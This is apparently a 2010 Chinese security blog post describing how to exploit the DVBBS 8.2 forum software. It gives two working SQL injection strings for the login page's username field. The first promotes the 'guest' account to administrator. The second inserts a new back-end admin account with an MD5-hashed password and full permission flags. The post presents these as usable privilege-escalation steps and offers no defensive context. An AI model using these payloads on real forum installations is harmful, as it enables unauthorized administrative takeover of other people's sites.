DVBBS 8.2 漏洞利用
发布:admin | 发布时间: 2010年2月8日在用户名处写入“';update dv_user set usergroupid=1 where username='guest'--”密码我就用正确的来写然后写好后登陆看到反回的信息
我们可以看到登陆提示为“本论坛不存在该用户名”这个就说明我们所提升的帐户“guest”已经为管理员了。
现在我们已经是前台管理员了。
那么怎样才能让我们的帐户具有后台权限呢?我们继续来到login.asp这个登陆页面。在用户名处写入guest';insert into dv_admin (username,password,flag,adduser) values('guset','49ba59abbe56e057','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','guest')--
49ba59abbe56e057为MD5加密后的密码
成功登陆的话 就说明提权成功
文章如转载,请注明转载自:http://www.5iadmin.com/post/275.html
- 相关文章:
前一篇:如何监控活动目录的对象 »
发布:admin | 分类:最新漏洞 | 评论:0 | 引用:0 | 浏览:
| TrackBack引用地址
发表评论
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。